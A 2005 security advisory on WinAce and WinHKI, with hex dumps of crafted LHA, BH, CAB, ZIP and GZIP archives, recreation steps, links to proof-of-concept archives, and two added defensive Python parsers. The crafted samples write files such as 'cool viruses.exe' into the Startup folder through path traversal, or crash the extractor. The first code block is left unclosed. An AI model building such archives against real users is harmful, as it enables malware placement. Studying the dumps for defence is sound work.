[NT] Multiple Vulnerabilities in WinAce and WinHKI File Archivers

From: SecuriTeam (support_at_securiteam.com)
Date: 01/09/05

  • Next message: SecuriTeam: "[UNIX] SugarCRM Arbitrary File Inclusion"
    To: list@securiteam.com
    Date: 9 Jan 2005 14:05:42 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Multiple Vulnerabilities in WinAce and WinHKI File Archivers
    ------------------------------------------------------------------------

    SUMMARY

    WinAce and WinHKI (both at <http://www.webtoolmaster.com>) are file
    archivers that support the CAB, JAR, ZIP, RAR, TAR, GZ, LZA, LHA, BH and
    HKI formats.

    Multiple vulnerabilities in WinAce and WinHKI allow a remote attacker who
    can get the victim to extract a crafted archive to write files to
    arbitrary locations on the target's machine (for example the All Users
    Startup folder, which gets the file executed at the next logon), or to
    crash WinHKI.

    DETAILS

    Vulnerable Systems:
     * WinAce Version 1.4d
     * WinHKI Version 1.4d

    WinHKI - LHA File: Incorrect Filename-Length Handling Leads to Crash/Underflow:
    This is a normal LHA (level-0) header; the byte at offset 0x15 (0x08) is
    the length of the file name "\102.htm" that follows it:
    00000000 1EFF 2D6C 6830 2D1B 0000 001B 0000 0039 ..-lh0-........9
    00000010 7378 3120 0008 5C31 3032 2E68 746D 4543 sx1 ..\102.htmEC
    00000020 3C73 6372 6970 7466 3E61 6C65 7274 2829 <scriptf>alert()
    00000030 3C2F 7363 7269 7074 3E0D 0A62 5F2D 6C68 </script>..b_-lh
    00000040 642D 0000 0000 0000 0000 94A4 8431 1000 d-...........1..

    The last byte shown in the following excerpt (offset 0x15, here raised
    from 0x08 to 0x20) is the length of the file name stored in the header.
    When the name actually stored is shorter than that byte claims, the header
    no longer has room for the name it declares (the underflow in the title)
    and WinHKI crashes:
    00000000 1EFF 2D6C 6830 2D1B 0000 001B 0000 0039 ..-lh0-........9
    00000010 7378 3120 0020 sx1 .

    To recreate this, either shorten the file name stored inside the header
    while leaving the length byte alone, or raise the length byte above the
    size of the name that is actually there.

    For Example:
    00000000 1EFF 2D6C 6830 2D1B 0000 001B 0000 0039 ..-lh0-........9
    00000010 7378 3120 0020 5C31 3073 7373 7373 7373 sx1 . \10sssssss
    00000020 3232 2E68 746D 4543 3C73 6372 6970 7466 22.htmEC<scriptf
    00000030 3E61 6C65 7274 2829 3C2F 7363 7269 7074 >alert()</script
    00000040 3E0D 0A62 5F2D 6C68 642D 0000 0000 0000 >..b_-lhd-......
    00000050 0000 94A4 8431 1000 4C5C 446F 6375 6D65 .....1..L\Docume

    Proof of Concept:
    An .lha archive that triggers the vulnerability can be found at:
    http://theinsider.deep-ice.com/poc.lha
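    The following parser is an added example, not code from the advisory or
    from WinHKI. It parses the LHA level-0 header layout shown above and refuses
    a filename-length byte that the declared header size has no room for,
    before it ever reads the name; the two byte strings are transcribed from the
    two hex dumps above (the benign header and the crafted one). The
    naive_extension_size function is only an illustration of how the unsigned
    arithmetic underflows when the length is trusted; it is an assumption about
    a careless extractor, not a reproduction of WinHKI's code.

```python
"""Defensive parser for LHA level-0 headers (added example, not WinHKI code)."""
import struct

# Constructed inputs transcribed from the advisory's hex dumps: the benign
# header, and the crafted one whose name-length byte (offset 0x15) was raised
# from 0x08 to 0x20 while the stored name stayed 16 bytes long.
GOOD_LHA = bytes.fromhex(
    "1EFF2D6C68302D1B0000001B00000039"
    "7378312000085C3130322E68746D4543"
    "3C736372697074663E616C6572742829"
    "3C2F7363726970743E0D0A625F2D6C68"
    "642D000000000000000094A484311000")
BAD_LHA = bytes.fromhex(
    "1EFF2D6C68302D1B0000001B00000039"
    "7378312000205C313073737373737373"
    "32322E68746D45433C73637269707466"
    "3E616C65727428293C2F736372697074"
    "3E0D0A625F2D6C68642D000000000000"
    "000094A4843110004C5C446F63756D65")


def parse_lha_level0(buf):
    """Parse one LHA level-0 header; raise ValueError instead of trusting a
    name-length byte the header cannot hold.  Layout (offsets from header start):
      0  header size = number of bytes that follow the checksum byte
      1  checksum   = sum(buf[2:2+size]) mod 256
      2  method (b"-lh0-"), 7 packed size, 11 original size, 15 DOS time/date
      19 attribute, 20 header level, 21 name length, 22 name, then CRC-16 LE.
    """
    if len(buf) < 22:
        raise ValueError("truncated header")
    hdr_size, checksum = buf[0], buf[1]
    method = buf[2:7]
    packed, orig, dostime = struct.unpack_from("<III", buf, 7)
    attr, level, name_len = buf[19], buf[20], buf[21]
    if level != 0:
        raise ValueError(f"not a level-0 header (level {level})")
    # The bound WinHKI evidently skipped: name plus CRC must fit inside the
    # hdr_size bytes that follow the checksum byte.
    name_end = 22 + name_len
    if name_end + 2 > 2 + hdr_size:
        raise ValueError(
            f"name length {name_len} does not fit in header of size {hdr_size}")
    if len(buf) < 2 + hdr_size:
        raise ValueError("truncated header")
    if sum(buf[2:2 + hdr_size]) & 0xFF != checksum:
        raise ValueError("header checksum mismatch")
    crc = struct.unpack_from("<H", buf, name_end)[0]
    return {"method": method, "packed_size": packed, "orig_size": orig,
            "dos_time": dostime, "attr": attr, "name": buf[22:name_end],
            "crc": crc, "data_offset": 2 + hdr_size}


def naive_extension_size(buf):
    """Size of the optional area after the CRC as a careless extractor would
    compute it, hdr_size - 22 - name_len in unsigned 32-bit arithmetic, without
    first checking that the name fits.  (Illustration of the underflow, an
    assumption about such an extractor, not WinHKI's actual code.)"""
    hdr_size, name_len = buf[0], buf[21]
    return (hdr_size - 22 - name_len) & 0xFFFFFFFF


def lha_header_status(buf):
    """(True, "ok") when the header is accepted, else (False, reason)."""
    try:
        parse_lha_level0(buf)
        return True, "ok"
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    for label, hdr in (("benign", GOOD_LHA), ("crafted", BAD_LHA)):
        ok, why = lha_header_status(hdr)
        print(f"{label:8} accepted={ok} reason={why} "
              f"naive_extension_size=0x{naive_extension_size(hdr):08X}")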

    WinHKI - BH File Directory Traversal:
    This is a normal BH compressed file header:
    00000000 484B 4901 1441 0000 FD00 3973 7831 8D34 HKI..A....9sx1.4
    00000010 3741 7800 0000 1B00 0000 0500 0000 302E 7Ax...........0.
    00000020 6874 6D00 0010 0078 0000 001B 0000 008D htm....x........
    00000030 3437 4101 0000 0001 06FF FF00 0000 0000 47A.............

    In the following sample, we can see how easy it is to change the path to
    anywhere we want, including the All Users Startup folder:
    00000000 484B 4901 1441 0000 FD00 6C8C 9031 066A HKI..A....l..1.j
    00000010 8E05 F600 0000 D300 0000 4000 0000 633A ..........@...c:
    00000020 5C64 6F63 756D 657E 315C 616C 6C75 7365 \docume~1\alluse
    00000030 7E31 5C73 7461 7274 6D7E 315C 7072 6F67 ~1\startm~1\prog
    00000040 7261 6D73 5C73 7461 7274 7570 5C63 6F6F rams\startup\coo
    00000050 6C20 2076 6972 7573 6573 2E65 7865 0000 l viruses.exe..
    00000060 1000 F600 0000 D300 0000 066A 8E05 0100 ...........j....

    All we need to do is compress a file with a long name/path into a .bh
    archive (using WinHKI) and change the path stored inside the archive to
    whatever we want.

    Proof of Concept:
    A .bh archive that triggers the vulnerability can be found at:
    http://theinsider.deep-ice.com/poc.bh

    WinHKI - CAB File Directory Traversal:
    This is a normal CAB compressed file header:
    00000000 4D53 4346 0000 0000 0E30 0F00 0000 0000 MSCF.....0......
    00000010 2C00 0000 0000 0000 0301 0100 0100 0000 ,...............
    00000020 0000 0000 5800 0000 2000 0100 C8EE 0F00 ....X... .......
    00000030 0000 0000 0000 0C2F CC61 2000 7356 5656 ......./.a .sVVV
    00000040 5656 5656 5656 5656 5656 5656 5656 5656 VVVVVVVVVVVVVVVV
    00000050 5670 352E 6578 6500 5D5B 7CBC 2742 0080 Vp5.exe.][|.'B..
    00000060 434B EC5A 7F54 5457 7E7F 33CC C000 036F CK.Z.TTW~.3....o

    In the following sample, we can see how easy it is to change the path to
    anywhere we want, including the All Users Startup folder:

    00000000 4D53 4346 0000 0000 0E30 0F00 0000 0000 MSCF.....0......
    00000010 2C00 0000 0000 0000 0301 0100 0100 0000 ,...............
    00000020 0000 0000 5800 0000 2000 0100 C8EE 0F00 ....X... .......
    00000030 0000 0000 0000 0C2F CC61 2000 433A 5C56 ......./.a .C:\V
    00000040 5656 5656 5656 5656 5656 5656 5656 5656 VVVVVVVVVVVVVVVV
    00000050 5670 352E 6578 6500 5D5B 7CBC 2742 0080 Vp5.exe.][|.'B..
    00000060 434B EC5A 7F54 5457 7E7F 33CC C000 036F CK.Z.TTW~.3....o

    All we need to do is cab compress (using Microsoft's "makecab" or WinAce)
    a file with a long name/path and overwrite the NUL-terminated name stored
    in the archive's CFFILE entry with whatever path we want; here the
    replacement keeps the original length, so no other field needs fixing.

    Proof of Concept:
    A .cab archive that triggers the vulnerability can be found at:
    http://theinsider.web1000.com/hki_transversal.cab

    WinAce & WinHKI - ZIP File Directory Traversal:
    This is a normal ZIP compressed file header:
    00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..
    00000010 F209 3C2F 0F00 C8EE 0F00 0700 0000 7370 ..</..........sp
    00000020 352E 6578 65EC 5A7F 5454 577E 7F33 0C30 5.exe.Z.TTW~.3.0
    00000030 C0C0 1B94 8926 6A32 2AAE D9FC 206E 2628 .....&j2*... n&(
    00000040 2018 1186 4044 7D3A E40D 4940 4304 7CCC ...@D}:..I@C.|.

    In the following sample, we can see how easy it is to change the path to
    anywhere we want, including the All Users Startup folder.
    The file name was changed from sp5.exe to vb/../../sp5.exe, and the
    name-length field at offset 0x1A from 0x07 to 0x10 to match:
    00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..
    00000010 F209 3C2F 0F00 C8EE 0F00 1000 0000 7662 ..</..........vb
    00000020 2F2E 2E2F 2E2E 2F73 7035 2E65 7865 EC5A /../../sp5.exe.Z
    00000030 7F54 5457 7E7F 330C 30C0 C01B 9489 266A .TTW~.3.0.....&j
    00000040 322A AED9 FC20 6E26 2820 1811 8640 447D 2*... n&( ...@D}

    All we need to do is zip compress (using WinZip, WinRAR or WinAce) a file
    with a long name/path and change the name stored in the local file header
    (together with its length field) to whatever we want.

    Proof of Concept:
    A .ZIP archive that triggers the vulnerability can be found at:
    http://theinsider.web1000.com/WINACE-WINHKI_ZIP_TRANSVERSAL.zip

    WinAce - GZIP File Directory Traversal:
    This is a normal GZIP compressed file header:
    00000000 1F8B 0808 DC89 9641 0000 7769 6E33 322D .......A..win32-
    00000010 7368 656C 6C63 6F64 652E 7064 6600 BCBC shellcode.pdf...
    00000020 073C 95FF FB3F 5E66 227B 671C 2487 749C .<...?^f"{g.$.t.
    00000030 7D8E 5956 F626 23C9 96BD B790 BD77 F6C8 }.YV.&#......w..
    00000040 2622 2264 9411 2111 45F6 5656 4684 28FF &""d..!.E.VVF.(.

    In the following sample, we can see how easy it is to change the path to
    anywhere we want, including the All Users Startup folder.

    The file name (the NUL-terminated FNAME field that follows the 10-byte
    gzip header when flag bit 3, 0x08, is set, as it is here) was changed from
    win32-shellcode.pdf to ../../../../../rafi.exe:
    00000000 1F8B 0808 CE7D A441 0000 2E2E 2F2E 2E2F .....}.A..../../
    00000010 2E2E 2F2E 2E2F 2E2E 2F72 6166 692E 6578 ../../../rafi.ex
    00000020 6500 B329 4E2E CA2C 2849 B34B CC49 2D2A e..)N..,(I.K.I-*
    00000030 D1D0 B4D1 8708 D8F1 7201 0045 5910 EA1B ........r..EY...
    00000040 0000 00 ...

    All we need to do is GZIP compress (using WinAce) a file with a long
    name/path and change the name stored inside the file to whatever we want.

    Proof of Concept:
    A .gz archive that triggers the vulnerability can be found at:
    http://theinsider.deep-ice.com/winace_gz_file_transversal.gz
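    The BH, CAB, ZIP and GZIP sections above all come down to the same
    extractor mistake: the name stored in the archive is joined onto the
    destination directory as-is. The following is an added example, not code
    from the advisory or from either vendor. It reads the member name out of
    the ZIP local file header, the gzip FNAME field and the CAB CFFILE entry
    exactly as they appear in the hex dumps above (byte strings transcribed
    from those dumps, truncated after the name field), then applies the check
    an extractor must do before creating the file. BH is WinHKI's own format
    and the advisory only shows its path string, so that one is used as a
    literal rather than parsed; the destination directory /tmp/out is an
    assumption and nothing is written to disk.

```python
"""Member-name extraction and traversal check (added example, not vendor code)."""
import os
import re
import struct

# Constructed inputs transcribed from the advisory's hex dumps.
ZIP_GOOD = bytes.fromhex("504B0304140002000800CC810C2FB78F"
                         "F2093C2F0F00C8EE0F00070000007370"
                         "352E657865EC5A7F5454577E7F330C30")
ZIP_BAD = bytes.fromhex("504B0304140002000800CC810C2FB78F"
                        "F2093C2F0F00C8EE0F00100000007662"
                        "2F2E2E2F2E2E2F7370352E657865EC5A")
GZ_GOOD = bytes.fromhex("1F8B0808DC899641000077696E33322D"
                        "7368656C6C636F64652E70646600BCBC")
GZ_BAD = bytes.fromhex("1F8B0808CE7DA44100002E2E2F2E2E2F"
                       "2E2E2F2E2E2F2E2E2F726166692E6578"
                       "6500B3294E2ECA2C2849B34BCC492D2A")
CAB_GOOD = bytes.fromhex("4D534346000000000E300F0000000000"
                         "2C000000000000000301010001000000"
                         "000000005800000020000100C8EE0F00"
                         "0000000000000C2FCC61200073565656"
                         "56565656565656565656565656565656"
                         "5670352E657865005D5B7CBC27420080")
CAB_BAD = bytes.fromhex("4D534346000000000E300F0000000000"
                        "2C000000000000000301010001000000"
                        "000000005800000020000100C8EE0F00"
                        "0000000000000C2FCC612000433A5C56"
                        "56565656565656565656565656565656"
                        "5670352E657865005D5B7CBC27420080")
# BH is proprietary; the advisory only shows the stored path, used as-is.
BH_BAD_NAME = "c:\\docume~1\\alluse~1\\startm~1\\programs\\startup\\cool viruses.exe"


def zip_member_name(buf):
    """Name from a ZIP local file header: 30 fixed bytes, then the name."""
    (sig, _ver, _flags, _method, _time, _date, _crc, _csize, _usize,
     name_len, _extra_len) = struct.unpack_from("<4sHHHHHIIIHH", buf, 0)
    if sig != b"PK\x03\x04":
        raise ValueError("not a ZIP local file header")
    return buf[30:30 + name_len].decode("latin-1")


def gzip_member_name(buf):
    """Name from a gzip member: 10 fixed bytes, optional FEXTRA (bit 2),
    then a NUL-terminated name if FNAME (bit 3) is set, else None."""
    if buf[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip member")
    flg, pos = buf[3], 10
    if flg & 0x04:
        pos += 2 + struct.unpack_from("<H", buf, pos)[0]
    if not flg & 0x08:
        return None
    return buf[pos:buf.index(b"\x00", pos)].decode("latin-1")


def cab_member_name(buf):
    """Name of the first CFFILE entry: CFHEADER.coffFiles (offset 16) points at
    the entry; its NUL-terminated szName follows a 16-byte fixed part."""
    if buf[:4] != b"MSCF":
        raise ValueError("not a CAB file")
    start = struct.unpack_from("<I", buf, 16)[0] + 16
    return buf[start:buf.index(b"\x00", start)].decode("latin-1")


_DRIVE = re.compile(r"^[A-Za-z]:")


def check_member_name(name):
    """Lexical check before joining a member name onto the destination.
    Returns (ok, reason).  Both separators count, so c:\\x and ../x are caught."""
    n = name.replace("\\", "/")
    if n.startswith("/") or _DRIVE.match(n):
        return False, "absolute path or drive letter"
    parts = [p for p in n.split("/") if p not in ("", ".")]
    if not parts:
        return False, "empty name"
    if ".." in parts:
        return False, "parent-directory component"
    if any("\x00" in p for p in parts):
        return False, "embedded NUL"
    return True, "ok"


def safe_extract_path(dest, name):
    """Resolve name under dest; second line of defence is a commonpath check
    on the absolute result, so nothing outside dest is ever returned."""
    ok, reason = check_member_name(name)
    if not ok:
        raise ValueError(f"refusing {name!r}: {reason}")
    dest_abs = os.path.abspath(dest)
    target = os.path.abspath(os.path.join(dest_abs, name.replace("\\", "/")))
    if os.path.commonpath([dest_abs, target]) != dest_abs:
        raise ValueError(f"refusing {name!r}: escapes {dest}")
    return target


def is_extractable(dest, name):
    try:
        safe_extract_path(dest, name)
        return True
    except ValueError:
        return False


def audit_samples():
    """Every sample name through the check: {label: (name, accepted)}."""
    names = {"zip-good": zip_member_name(ZIP_GOOD), "zip-bad": zip_member_name(ZIP_BAD),
             "gz-good": gzip_member_name(GZ_GOOD), "gz-bad": gzip_member_name(GZ_BAD),
             "cab-good": cab_member_name(CAB_GOOD), "cab-bad": cab_member_name(CAB_BAD),
             "bh-bad": BH_BAD_NAME}
    return {k: (v, check_member_name(v)[0]) for k, v in names.items()}


if __name__ == "__main__":
    for label, (name, ok) in audit_samples().items():
        print(f"{label:9} {'OK  ' if ok else 'DENY'} {name}")
```

    The three benign names pass; vb/../../sp5.exe is refused for its ".."
    components, ../../../../../rafi.exe likewise, and both the C:\V...p5.exe
    CAB name and the BH path into the Startup folder are refused for carrying a
    drive letter. Rejecting the name lexically first matters because a path
    that contains ".." can be made to resolve inside dest through a symlink or
    junction the attacker controls, and a check done only after resolution
    would then pass it.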

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:the_insider@mail.com> Rafel
    Ivgi, The-Insider.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

